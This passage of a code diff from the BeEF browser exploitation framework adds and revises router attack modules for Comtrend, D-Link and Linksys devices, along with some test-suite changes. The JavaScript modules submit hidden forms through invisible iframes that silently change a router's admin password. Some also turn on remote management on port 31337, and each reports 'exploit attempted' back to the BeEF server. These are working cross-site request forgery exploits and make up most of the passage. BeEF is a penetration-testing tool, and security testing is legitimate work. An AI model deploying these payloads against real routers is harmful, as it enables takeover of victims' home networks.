+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Comtrend_ct5624_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/router/dlink_dsl500t_csrf/command.js

@@ -0,0 +1,71 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var target = gateway + "/cgi-bin/webcm";
+
+  var dsl500t_iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', target);
+  form.setAttribute('method', 'post');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'getpage');
+  input.setAttribute('value', '../html/tools/usrmgmt.htm');
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'security:settings/username');
+  input.setAttribute('value', 'admin');
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'security:settings/password');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'security:settings/password_confirm');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'security:settings/idle_timeout');
+  input.setAttribute('value', '30');
+  form.appendChild(input);
+
+  dsl500t_iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(dsl500t_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/router/dlink_dsl500t_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        dlink_dsl500t_csrf:
+            enable: true
+            category: "Router"
+            name: "D-Link DSL500T CSRF"
+            description: "Attempts to change the password on a D-Link DSL500T router."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/router/dlink_dsl500t_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Dlink_dsl500t_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/router/linksys_befsr41_csrf/command.js

@@ -14,7 +14,15 @@
 //   limitations under the License.
 //
 beef.execute(function() {
-  var iframe = beef.dom.createInvisibleIframe();
-  iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+
+  var befsr41_iframe = beef.dom.createInvisibleIframe();
+  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(befsr41_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+

modules/router/linksys_befsr41_csrf/module.rb

@@ -17,7 +17,7 @@ class Linksys_befsr41_csrf < BeEF::Core::Command
   
   def self.options
     return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
         {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
         {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
     ]

modules/router/linksys_wrt54g2_csrf/command.js

@@ -20,7 +20,7 @@ beef.execute(function() {
 
   var target = gateway + "Manage.tri";
 
-  var iframe = beef.dom.createInvisibleIframe();
+  var wrt54g2_iframe = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
   input.setAttribute('value', 'en');
   form.appendChild(input);
 
-  iframe.contentWindow.document.body.appendChild(form);
+  wrt54g2_iframe.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wrt54g2_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+

modules/router/linksys_wrt54g2_csrf/module.rb

@@ -17,7 +17,7 @@ class Linksys_wrt54g2_csrf < BeEF::Core::Command
   
   def self.options
     return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
         {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
         {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
     ]

modules/router/linksys_wrt54g_csrf/command.js

@@ -20,7 +20,7 @@ beef.execute(function() {
 
   var target = gateway + "manage.tri";
 
-  var iframe = beef.dom.createInvisibleIframe();
+  var wrt54g_iframe = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
   input.setAttribute('value', 'en');
   form.appendChild(input);
 
-  iframe.contentWindow.document.body.appendChild(form);
+  wrt54g_iframe.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wrt54g_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+

modules/router/linksys_wrt54g_csrf/module.rb

@@ -17,7 +17,7 @@ class Linksys_wrt54g_csrf < BeEF::Core::Command
   
   def self.options
     return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
         {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
         {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
     ]

test/common/beef_test.rb

@@ -20,6 +20,7 @@ class BeefTest
     session.fill_in 'user', :with => 'beef'
     session.fill_in 'pass', :with => 'beef'
     session.click_button('Login')
+    sleep 20.0
 
     session
   end

test/common/test_constants.rb

@@ -1,6 +1,6 @@
 BEEF_TEST_DIR = "/tmp/beef-test/"
 
 ATTACK_DOMAIN = "attacker.beefproject.com"
-VICTIM_DOMAIN = "victim.beefproject.com"
+VICTIM_DOMAIN = "attacker.beefproject.com"
 ATTACK_URL = "http://" + ATTACK_DOMAIN + ":3000/ui/panel"
 VICTIM_URL = "http://" + VICTIM_DOMAIN + ":3000/demos/basic.html"

test/thirdparty/msf/unit/tc_metasploit.rb

@@ -41,6 +41,7 @@ class TC_Metasploit < Test::Unit::TestCase
   # Load the config for testing
   #
   def load_config
+    BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
     BeEF::Core::Configuration.instance.load_extensions_config
     @config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
   end

test/unit/core/tc_bootstrap.rb

@@ -13,26 +13,28 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
-module BeEF
-module Core
-module Models
+require 'test/unit'
 
-  class DynamicPayloadInfo
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamicpayloadinfo'
-  
-    property :id, Serial
-    property :name, String, :length => 30
-    property :value, String, :length => 255
-    property :required, Boolean, :default => false
-    property :description, Text, :lazy => false
-  
-    belongs_to :dynamic_payloads
-  
+class TC_Bootstrap < Test::Unit::TestCase
+
+  def setup
+    $root_dir = "../../"
+    $:.unshift File.join( %w{ ../../ } )
+    BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
+  end
+
+  def teardown
+    $root_dir = nil
+  end
+
+  #
+  # Test the core is functional
+  #
+  def test_bootstrap
+    assert_nothing_raised do
+      require 'core/bootstrap'
+    end
   end
 
 end
-end
-end
+

test/unit/ts_unit.rb

@@ -22,6 +22,7 @@ require './core/filter/tc_command'
 require './core/tc_loader'
 require './core/tc_core'
 require './core/tc_api'
+require './core/tc_bootstrap'
 require './core/tc_modules'
 require './core/tc_social_engineering'
 require './core/tc_autorun'
@@ -44,6 +45,7 @@ class TS_BeefTests
     suite << TC_Filter.suite
     suite << TC_Loader.suite
     suite << TC_Core.suite
+    suite << TC_Bootstrap.suite
     suite << TC_Api.suite
     suite << TC_Modules.suite
     suite << TC_Filesystem.suite
@@ -64,5 +66,4 @@ class TS_BeefTests
   end
 end
 
-Test::Unit::UI::Console::TestRunner.run(TS_BeefTests)
-
+Test::Unit::UI::Console::TestRunner.run(TS_BeefTests)